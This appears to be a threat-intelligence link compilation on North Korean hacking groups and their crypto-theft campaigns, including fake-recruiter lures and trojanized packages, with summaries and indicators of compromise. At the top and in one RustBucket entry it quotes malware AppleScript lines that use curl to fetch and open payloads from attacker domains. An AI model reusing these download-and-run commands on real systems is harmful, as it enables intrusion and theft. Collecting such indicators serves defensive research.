  • do shell script "curl -o /users/shared/1.zip https://cloud.dnx.capital/ZyCws4dD_zE/aUhUJV@p6P/S9XrRH9%2B/R51g4b5Kjj/abnY%3D -A curl"
  • do shell script "unzip -o -d /users/shared /users/shared/1.zip"
  • do shell script "open \"/users/shared/Internal PDF Viewer.app\""
  • cloud.dnx[.]capital

APT-C-28 (ScarCruft) Organization Uses Malicious Documents to Deliver RokRAT Attack Activity Analysis

Kimsuky - Phishing Attacks Targeting North Korea-Related Personnel

US sanctions orgs behind North Korea’s ‘illicit’ IT worker army

North Korea is now Mining Crypto to Launder Its Stolen Loot

  • Date:: 2023-05-23
  • Today, cybersecurity firm Mandiant published a report on a prolific North Korean state-sponsored hacking group it's now calling APT43, sometimes known by the names Kimsuky and Thallium. The group, whose activities suggest its members work in the service of North Korea's Reconnaissance General Bureau spy agency, has been primarily focused on espionage, hacking think tanks, academics, and private industry from the US to Europe, South Korea, and Japan since at least 2018, mostly with phishing campaigns designed to harvest credentials from victims and plant malware on their machines.
  • Like many North Korean hacker groups, APT43 also maintains a sideline in profit-focused cybercrime, according to Mandiant, stealing any cryptocurrency that can enrich the North Korean regime or even just fund the hackers' own operations. And as regulators worldwide have tightened their grip on exchanges and laundering services that thieves and hackers use to cash out criminally tainted coins, APT43 appears to be trying out a new method to cash out the funds it steals while preventing them from being seized or frozen: It pays that stolen cryptocurrency into “hashing services” that allow anyone to rent time on computers used to mine cryptocurrency, harvesting newly mined coins that have no apparent ties to criminal activity.
  • https://web.archive.org/web/20230328150400/https://wired.com/story/north-korea-apt43-crypto-mining-laundering/

Bluenoroff’s RustBucket campaign (SnatchCrypto)

  • Date:: 2023-05-23
  • https://blog.sekoia.io/bluenoroffs-rustbucket-campaign
  • cloud.dnx[.]capital
  • The RustBucket infection chain consists of a macOS installer that installs a backdoored, yet functional, PDF reader. The fake PDF reader then requires opening a specific PDF file that operates as a key to trigger the malicious activity.
  • When opened in a classical PDF reader, the PDF document displays a message asking the user to open the document in the proper reader (i.e. the backdoored one). When opened in this reader, the PDF displays a nine-page document about a venture capital company that appears to be the printout of a legitimate company's website. The fake PDF reader uses a hardcoded 100-byte XOR key to decrypt the new content of the document and the C2 server configuration.
  • During our investigation on the macOS variant, Sekoia.io analysts identified a .NET version of RustBucket, with a similar GUI, developed using the library DevExpress.XtraPdfViewer. The malware was embedded in a ZIP archive containing the PDF reader and the “key” PDF requiring user interaction.
  • Bluenoroff's observed initial intrusion vectors include phishing emails, as well as leveraging social networks such as LinkedIn. During our investigations, we identified the domain sarahbeery.docsend[.]me; further analysis led us to the following LinkedIn profile:
  • RustBucket MacOS version - 2023-05-08 - Jump Crypto Investment Agreement
  • RustBucket MacOS version - 2023-05-02
  • RustBucket MacOS version - 2023-04-23
  • RustBucket MacOS version - 2023-04-21
  • RustBucket MacOS version - 2023-03-02
  • RustBucket MacOS version - 2023-02-13 (creation date 2022-12-20)
  • RustBucket Windows version

Kimsuky - Kimsuky Strikes Again | New Social Engineering Campaign Aims to Steal Credentials and Gather Strategic Intelligence

  • Date:: 2023-06-06
  • Kimsuky conducted a social engineering campaign targeting experts in DPRK issues to steal Google and subscription credentials of a reputable news and analysis service focusing on the DPRK, as well as deliver reconnaissance malware. Kimsuky also engaged in extensive email correspondence and used spoofed URLs, websites imitating legitimate web platforms and Office documents weaponized with the ReconShark malware. The activity indicates Kimsuky’s growing dedication to social engineering and highlights the group’s increasing interest in gathering strategic intelligence.
  • https://sentinelone.com/labs/kimsuky-new-social-engineering-campaign-aims-to-steal-credentials-and-gather-strategic-intelligence/

North Korea-Aligned TAG-71 Spoofs Financial Institutions in Asia and US

Report: North Korean Hackers Have Stolen $3 Billion Worth of Crypto

Andariel’s silly mistakes and a new malware family

Recorded Future: North Korea’s Cyber Strategy

Phylum: Sophisticated Ongoing Attack on NPM

How DPRK’s macOS RustBucket Seeks to Evade Analysis and Detection

The DPRK strikes using a new variant of RUSTBUCKET

  • Date:: 2023-07-13
  • https://elastic.co/security-labs/DPRK-strikes-using-a-new-variant-of-rustbucket
  • RustBucket, Bluenoroff, DangerousPassword
  • do shell script "curl -o \"/users/shared/Potential Risks of Cryptocurrency Assets.pdf\" https://crypto.hondchain.com/OuhVX8sdV21/HBKPHFlbyt/9zkMp5L5HS/fP7saoS3GZ/7fVinrx -A cur1-agent"
  • 104.168.167[.]88
  • C2:: crypto.hondchain[.]com
  • C2:: starbucls[.]xyz
  • C2:: jaicvc[.]com
  • C2:: docsend.linkpc[.]net (dynamic DNS domain)

GitHub Security Alert: Social engineering campaign targets technology industry employees

The CoinsPaid Hack Explained: We Know Exactly How Attackers Stole and Laundered $37M USD

Mandiant: North Korea Leverages SaaS Provider in a Targeted Supply Chain Attack (JumpCloud)

  • Date:: 2023-07-24
  • https://cloud.google.com/blog/topics/threat-intelligence/north-korea-supply-chain/
  • UNC4899, TraderTraitor, ExpressVPN, JumpCloud, Trading Technologies, X_TRADER, 3CX

Scarcruft - Detecting Ongoing STARK#MULE Attack Campaign Targeting Victims Using US Military Document Lures

Kimsuky - Spreading malware disguised as coin and investment-related content

ReversingLabs: VMConnect - Malicious PyPI packages imitate popular open source modules

  • Date:: 2023-08-03
  • https://reversinglabs.com/blog/vmconnect-malicious-pypi-packages-imitate-popular-open-source-modules
  • New malicious PyPI campaign that includes a suspicious VMConnect package published to the PyPI repo.
  • When we decoded the string, we discovered that it contains a download URL which is modified based on the information collected from the host machine. The substring paperpin3902 in the command and control URL is replaced with a string containing the first letter of the host's platform name, the username and a random, 6-character-long string.
  • C2:: 45.61.139[.]219
  • C2:: ethertestnet[.]pro
  • C2:: deliworkshopexpress[.]xyz

FBI Identifies Cryptocurrency Funds Stolen by DPRK

US arrests Tornado Cash co-founder, sanctions another who remains at large

Lazarus Group's infrastructure reuse leads to discovery of new malware

VMConnect supply chain attack continues, evidence points to North Korea

Mandiant: APT38 - Un-usual Suspects

Lazarus luring employees with trojanized coding challenges: The case of a Spanish aerospace company

Active North Korean campaign targeting security researchers

  • Date:: 2023-09-07
  • In January 2021, a DPRK cyber actor campaign was publicly disclosed, in which they used 0-day exploits to target security researchers working on vulnerability research and development. Over the past two and a half years, the campaign has continued. Recently, DPRK cyber actors were found to likely be responsible for a new, similar campaign, with at least one actively exploited 0-day being used to target security researchers in the past several weeks. DPRK threat actors used social media sites like X (formerly Twitter) to build rapport with their targets. After initial contact via X, they moved to an encrypted messaging app such as Signal, WhatsApp or Wire. Once a relationship was developed with a targeted researcher, the threat actors sent a malicious file that contained at least one 0-day in a popular software package. Upon successful exploitation, the shellcode conducts a series of anti-virtual-machine checks and then sends the collected information, along with a screenshot, back to an attacker-controlled command and control domain. The shellcode used in this exploit is constructed in a similar manner to shellcode observed in previous North Korean exploits.
  • https://blog.google/threat-analysis-group/active-north-korean-campaign-targeting-security-researchers/

Scarcruft exploits WinRAR vulnerability (CVE-2023-38831) targeting the cryptocurrency industry

  • Date:: 2023-09-18
  • https://paper.seebug.org/3033/
  • This recent wave of attacks is noteworthy for revealing that, apart from the Lazarus Group, there are other North Korean-affiliated entities engaging in targeted operations against the cryptocurrency industry, which is relatively uncommon in the security community.
  • The targets of this Konni group's recent attacks are notably different from their previous activities. Judging by the lure name, the attacks are directed towards the cryptocurrency industry. It is speculated that Konni may be exploring new attack vectors. The captured sample is named "wallet_Screenshot_2023_09_06_Qbao_Network.zip", and it references Qbao Network, which is described as follows:

Lazarus Group’s Undercover Operations 2022–2023 - L. Taewoo, S. Lee & D. Kim

How North Korean Workers Tricked U.S. Companies into Hiring Them and Secretly Funneled Their Earnings into Weapons Programs

TeamCity CVE-2023-42793 / CyberLink Supply Chain Attack

Lazarus’ New Campaign Exploiting Legitimate Software

Deep Dive into the Lazarus Group's Foray into macOS

  • Date:: 2023-10-29
  • https://slideshare.net/MITREATTACK/exploring-the-labyrinth-deep-dive-into-the-lazarus-groups-foray-into-macos
  • This talk will deep dive into the interactive macOS intrusions Crowdstrike has attributed to LABYRINTH CHOLLIMA. We will delve into the adversary's macOS tradecraft, techniques to circumvent existing OS protections, and social engineering tactics, while showcasing how their mechanisms and tooling map to the MITRE ATT&CK kill chain, featuring some newly proposed MITRE techniques related to the Transparency, Consent, and Control (TCC) database.

FastViewer Variant Merged with FastSpy and disguised as a Legitimate Mobile Application

  • Date:: 2023-10-30
  • Kimsuky has created a FastViewer variant that induces a victim to install the app onto their mobile device by disguising the malware as a legitimate Android application (APK file), such as Google Authenticator, an anti-virus program, or a payment service application. The FastViewer malware receives commands directly from the server without downloading additional malware, and the main purpose of this FastViewer variant is to steal information from infected devices. It appears that Kimsuky has developed this malware since at least July 2023 to target Republic of Korea victims. The report further notes that the disguised applications are expected to be distributed via spearphishing emails or smishing to trick targets into running them.
  • https://medium.com/s2wblog/fastviewer-variant-merged-with-fastspy-and-disguised-as-a-legitimate-mobile-application-f3004588f95c

Lazarus Targets Blockchain Engineers With New KandyKorn macOS Malware

Kimsuky - Operation Covert Stalker

Crypto-Themed npm Packages Found Delivering Stealthy Malware

Microsoft: BlueNoroff hackers plan new crypto-theft attacks

Jamf - BlueNoroff strikes again with new macOS malware

Two South Koreans indicted for allegedly colluding with North Korean hackers

Palo Alto - Hacking Employers and Seeking Employment: Two Job-Related Campaigns Bear Hallmarks of North Korean Threat Actors

Korean gov’t officials targeted by North’s ‘journalist’ crypto hackers

Microsoft: Diamond Sleet supply chain compromise distributes a modified CyberLink installer

  • Date:: 2023-11-22
  • https://microsoft.com/en-us/security/blog/2023/11/22/diamond-sleet-supply-chain-compromise-distributes-a-modified-cyberlink-installer/
  • Microsoft has observed suspicious activity associated with the modified CyberLink installer file as early as October 20, 2023. The malicious file has been seen on over 100 devices in multiple countries, including Japan, Taiwan, Canada, and the United States. While Microsoft has not yet identified hands-on-keyboard activity carried out after compromise via this malware, the group has historically:
  • If these criteria are not met, the executable continues running the CyberLink software and abandons further execution of malicious code. Otherwise, the software attempts to contact one of three URLs to download the second-stage payload, which is embedded inside a file masquerading as a PNG file, using the static User-Agent "Microsoft Internet Explorer".
  • When invoked, the in-memory executable attempts to contact the following callbacks for further instruction. Both domains are legitimate but have been compromised by Diamond Sleet.

Operation Dream Magic, MagicLine4NX - Hackers use zero-day in supply-chain attack

FIOD + US Seizes Sinbad Crypto Mixer

US govt sanctions North Korea’s Kimsuky hacking group

Reuters: North Koreans use fake names, scripts to land remote IT work for cash

Alex Masmej Near Miss

Analysis of North Korean Hackers’ Targeted Phishing Scams on Telegram

Analysis of attack samples from suspected Lazarus (APT-Q-1) activity involving the npm package supply chain

Operation Blacksmith: Lazarus targets organizations worldwide using novel Telegram-based malware written in DLang

Koda's recent DPRK IoCs

To stem North Korea’s missiles program, White House looks to its hackers

Kimsuky Hackers Deploying AppleSeed, Meterpreter, and TinyNuke in Latest Attacks

"Obfuscated code a "recruiter" sent me"

Blockchain dev's wallet emptied in "job interview" using npm package

Phylum: Fake Developer Jobs Laced With Malware

  • Date:: 2023-12-20
  • https://blog.phylum.io/smuggling-malware-in-test-code/
  • npm package trying to masquerade as code profiler which actually installs several malicious scripts including a cryptocurrency and credential stealer
  • Attempted to hide the malicious code in a test file, presumably thinking that no one would bother to look for malware in test code.

2024

Phylum: Update to November's Crypto-Themed npm Attack

Comprehensive Report on North Korean Hackers, Phishing Groups, and Money Laundering in 2023

North Korea Threat Landscape Update

Funds Stolen from Crypto Platforms Fall More Than 50% in 2023, but Hacking Remains a Significant Threat as Number of Incidents Rises

CVE-2024-21338 - North Korea's Lazarus deploys rootkit via AppLocker zero-day flaw

SquidSquad - Phishing by Appointment: Suspected North Korean Hackers Target Blockchain Community Via Telegram

UN Security Council Report

  • Date:: 2024-03-07
  • According to a cybersecurity company, the IP address of the Kimsuky server hosting this malware is 144.76.109.61 and the IP address of another, related server hosting the Kimsuky-controlled domain civilarys[.]store is 27.255.81.77. Kimsuky-related email accounts associated with this campaign include luckgpu[@]gmail.com and abdulsamee7561[@]gmail.com. The malicious applications were likely distributed via spearphishing or smishing.

MurAll Hacked by Contagious Interview

  • Date:: 2024-03-05
  • https://t.me/investigations/97
  • 0x01720163e9385e832fFe3387ba7098be4dF303e0
  • 0x0cDB613Ec9a07E2AFE898F8519a0c0a981032118
  • 0x0520195f57c3a5fe886aa95778dafe684854b78c252d20f29cbe0c9c4c4bbddd

"test_interview.zip": 39785213364b84c1442d133c778bf5472d76d8ef13b58b32b8dd8ac0201c82ca

The Lazarus group appears to be currently reaching out to targets via LinkedIn and spreading malware

SlowMist: Lazarus group appears to be currently reaching out to targets via LinkedIn and steal employee privileges or assets through malware

re: DPRK IT Workers

SquidSquad - How Lazarus Group laundered $200M from 25+ crypto hacks to fiat from 2020–2023

Recruitment trap for blockchain practitioners: Analysis of suspected Lazarus (APT-Q-1) stealing operations

  • Date:: 2024-05-10
  • https://mp.weixin.qq.com/s/84lUaNSGo4lhQlpnCVUHfQ
  • Contagious Interview, BeaverTail, InvisibleFerret
  • Attackers create false identities on work platforms (such as LinkedIn, Upwork, Braintrust, etc.), disguised as employers, independent developers or startup founders, and publish job information with lucrative rewards or urgent tasks. The work content is usually software development or problem fixing.
  • Github:: plannet-plannet
  • Github:: bmstoreJ
  • Github:: CodePapaya
  • Github:: Allgoritex
  • Github:: bohinskamariia
  • Github:: danil33110
  • Github:: aluxiontemp
  • Github:: komeq1120
  • Github:: aufeine - Account active since 2024-04-15
  • Github:: dhayaprabhu - Account active since 2019. Malicious code base (dhayaprabhu/Crypto-Node.js) was first committed on 2024-02-01
  • Github:: MatheeshaMe - Account active since 2021. Malicious code repository (MatheeshaMe/etczunks-marketplace) submitted on 2023-10-11
  • Github:: Satyam-G5 - Account active since 2023. Malicious code repository (Satyam-G5/etczunks-marketplace) was forked from MatheeshaMe/etczunks-marketplace on 2023-10-12
  • Github:: emadmohd211 - Account active since 2021
  • Github:: alifarabi - Account active since 2020. Malicious code repository (alifarabi/organ-management) was first submitted on 2024-03-30
  • Bitbucket:: juandsuareza
  • Bitbucket:: freebling
  • Python Trojan, with C2 at 45.61.131[.]218:1245
  • Download a Python script for deploying AnyDesk from the URL "/adc/" of the first-stage C2 server (147.124.214[.]237:1244)

US court orders forfeiture of 279 crypto accounts tied to North Korea laundering

Exclusive: North Korea laundered $147.5 mln in stolen crypto in March, say UN experts

DPRK IT - Thousands of North Koreans stole Americans’ identities and took remote-work tech jobs at Fortune 500 companies, DOJ says

Microsoft: Moonstone Sleet emerges as new North Korean threat actor with new bag of tricks

From Opportunity to Threat: My Encounter with a Blockchain Job Scam

Mandiant: UNC4899 - Insights on Cyber Threats Targeting Users and Enterprises in Brazil

  • Date:: 2024-06-12
  • https://cloud.google.com/blog/topics/threat-intelligence/cyber-threats-targeting-brazil
  • North Korean Government-Backed Groups Targeting Brazil
  • Since 2020, North Korean cyber actors have accounted for approximately a third of government-backed phishing activity targeting Brazil. North Korean government-backed actors have targeted the Brazilian government and Brazil’s aerospace, technology, and financial services sectors. Similar to their targeting interests in other regions, cryptocurrency and financial technology firms have been a particular focus, and at least three North Korean groups have targeted Brazilian cryptocurrency and fintech companies.
  • In early 2024, PUKCHONG (UNC4899) targeted cryptocurrency professionals in multiple regions, including Brazil, using a Python app that was trojanized with malware. To deliver the malicious app, PUKCHONG reached out to targets via social media and sent a benign PDF containing a job description for an alleged job opportunity at a well known cryptocurrency firm. If the target replied with interest, PUKCHONG sent a second benign PDF with a skills questionnaire and instructions for completing a coding test. The instructions directed users to download and run a project hosted on GitHub. The project was a trojanized Python app for retrieving cryptocurrency prices that was modified to reach out to an attacker-controlled domain to retrieve a second stage payload if specific conditions were met.
  • North Korean government-backed groups have also in the past targeted Brazil’s aerospace and defense industry. In one example, PAEKTUSAN created an account impersonating an HR director at a Brazilian aerospace firm and used it to send phishing emails to employees at a second Brazilian aerospace firm. In a separate campaign, PAEKTUSAN masqueraded as a recruiter at a major US aerospace company and reached out to professionals in Brazil and other regions via email and social media about prospective job opportunities. Google blocked the emails, which contained malicious links to a DOCX file containing a job posting lure that dropped AGAMEMNON, a downloader written in C++. The attacker also likely attempted to deliver the malware via messages on social media and chat applications like WhatsApp. The campaigns were consistent with Operation Dream Job and activity previously described by Google. In both campaigns, we also sent users government-backed attacker alerts notifying them of the activity and sharing information about how to keep their accounts safe.
  • One North Korean group, PRONTO, concentrates on targeting diplomats globally, and their targets in Brazil follow this pattern. In one case, Google blocked a campaign that used a denuclearization-themed phishing lure and the group’s typical phishing kit - a fake PDF viewer that presents the users with a login prompt to enter their credentials in order to view the lure document. In another case, PRONTO used North Korea news-themed lures to direct diplomatic targets to credential harvesting pages.
  • One of the emerging trends we are witnessing globally from North Korean threat activity today is the insider threat posed by North Korean nationals gaining employment surreptitiously at corporations to conduct work in various IT roles. Though we have not yet observed direct connections between any of these North Korean IT workers and Brazilian enterprises, we note the potential for it to present a future risk given the growing startup ecosystem in Brazil, historical activity by North Korean threat actors in Brazil, and expansiveness of this problem.

"Crypto folks (hopefully) already know that Lazarus is one of the most prevalent threat actors targeting this industry..."

Decipher: New Version of BeaverTail macOS Malware Identified

Patrick Wardle: This Meeting Should Have Been an Email (BeaverTail)

KnowBe4: How a North Korean Fake IT Worker Tried to Infiltrate Us

U.S. DOJ: North Korean Government Hacker Charged for Involvement in Ransomware Attacks Targeting U.S. Hospitals and Health Care Providers (Andariel)

APT45: North Korea’s Digital Military Machine

Contagious Interview - Malicious npm Packages

North Korean threat actor Citrine Sleet exploiting Chromium zero-day (CVE-2024-7971)

APT Lazarus: Eager Crypto Beavers, Video calls and Games

  • Date:: 2024-09-04
  • https://group-ib.com/blog/apt-lazarus-python-scripts/
  • Contagious Interview, BeaverTail, InvisibleFerret, FCCCall
  • Covers recent Python scripts, including the CivetQ and BeaverTail malware variants, along with their updated Windows and Python releases.
  • The campaign begins with a fictitious job interview, tricking job-seekers into downloading and running a Node.js project which contains the BeaverTail malware, which in turn delivers the Python backdoor known as InvisibleFerret. BeaverTail was first discovered by PANW researchers as JavaScript malware in November 2023, and a native macOS version of BeaverTail was discovered in July 2024.
  • The actors are actively searching for potential victims on other job search platforms such as WWR, Moonlight, Upwork, and others.
  • freeconference[.]io
  • mirotalk[.]net
  • The malicious Javascript code is buried within these repositories. The following are examples of a trojanized repository, where the node server/server.js command was added to the “scripts” property in package.json. Here, server/server.js serves as the initial entry point, which in turn loads the malicious script in middlewares/helpers/error.js.

Threat Assessment: North Korean Threat Groups

  • Date:: 2024-09-09
  • https://unit42.paloaltonetworks.com/threat-assessment-north-korean-threat-groups-2024/
  • Lazarus has been used in public reporting as an umbrella term for threat actors from the Democratic People's Republic of Korea (DPRK), commonly referred to as North Korea. However, many of these threat actors can be classified into different groups under the Reconnaissance General Bureau (RGB) of the Korean People's Army.
  • Over the years, the RGB has revealed at least six threat groups.

ReversingLabs: Fake recruiter coding tests target devs with malicious Python packages

  • Date:: 2024-09-10
  • https://reversinglabs.com/blog/fake-recruiter-coding-tests-target-devs-with-malicious-python-packages
  • New malicious software packages believed to be linked to the VMConnect campaign, first identified in August 2023.
  • New samples were tracked to GitHub projects that have been linked to previous, targeted attacks in which developers are lured using fake job interviews. Furthermore, information gathered from the detected samples allowed us to identify one compromised developer and provided insights into an ongoing campaign, with attackers posing as employees of major financial services firms.
  • The malicious code was contained in altered pyperclip and pyrebase modules. The malicious code is present in both the `__init__.py` file and its corresponding compiled Python file (PYC) inside the `__pycache__` directory of the respective modules.
  • Searching open source information for the name led us to a GitHub profile of the developer. After establishing contact with the developer, we confirmed that he had fallen victim to the malicious actor pretending to be a recruiter from Capital One in January, 2024. In an email exchange with ReversingLabs, he revealed that he had been contacted from a LinkedIn profile and provided with a link to the GitHub repository as a “homework task.” The developer was asked to “find the bug,” resolve it and push changes that addressed the bug. When the changes were pushed, the fake recruiter asked him to send screenshots of the fixed bug — to make sure that developer executed the project on his machine.
  • Github:: ponpon262612
  • https://blogs.jpcert.or.jp/en/2023/05/dangerouspassword.html